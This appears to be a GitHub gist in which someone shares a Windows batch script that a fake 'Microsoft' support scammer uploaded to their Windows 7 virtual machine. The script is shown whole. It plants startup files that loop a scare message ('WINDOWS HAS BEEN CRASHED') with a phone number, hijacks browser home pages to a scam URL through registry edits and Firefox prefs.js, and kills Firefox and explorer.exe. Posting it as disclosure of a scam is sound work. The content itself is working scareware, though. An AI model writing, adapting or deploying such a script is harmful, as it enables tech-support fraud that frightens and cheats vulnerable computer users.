Created
August 9, 2017 04:16
-
-
Save anonymous/46bc981f1a27287e919c62a1248340d9 to your computer and use it in GitHub Desktop.
Windows batch script uploaded remotely to my Windows 7 virtual machine by fake "Microsoft" support scammer.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
rem Navigate to startup folder | |
cd "%userprofile%\Start Menu\Programs\Startup" | |
echo DO >> "startup1.vbs" | |
echo MSGBOX "WINDOWS HAS BEEN CRASHED, CALL WINDOWS SUPPORT 844-666-0661 FOR HELP " >> "startup1.vbs" | |
echo LOOP >> "startup1.vbs" | |
@echo off | |
echo cd "C:\Windows\System32" > "startup1.bat" | |
rem Navigate to startup folder | |
cd "%userprofile%\Start Menu\Programs\Startup" | |
echo @echo off >> "startup1.bat" | |
echo Go to Begin >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
echo taskkill /im firefox.exe* /f >> "startup1.bat" | |
echo cd /D "%APPDATA%\Mozilla\Firefox\Profiles" >> "startup1.bat" | |
echo cd *.default >> "startup1.bat" | |
echo set ffile=%cd% >> "startup1.bat" | |
echo echo user_pref("browser.startup.homepage", "http://wetech365.com/popup.jpg");>>"%ffile%\prefs.js" >> "startup1.bat" | |
echo set ffile= >> "startup1.bat" | |
echo cd %windir% >> "startup1.bat" | |
echo javascript:(function(){ window.location.href='http://wetech365.com/popup.jpg';})(); >> "startup1.bat" | |
echo taskkill /f /IM explorer.exe >> "startup2.bat" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment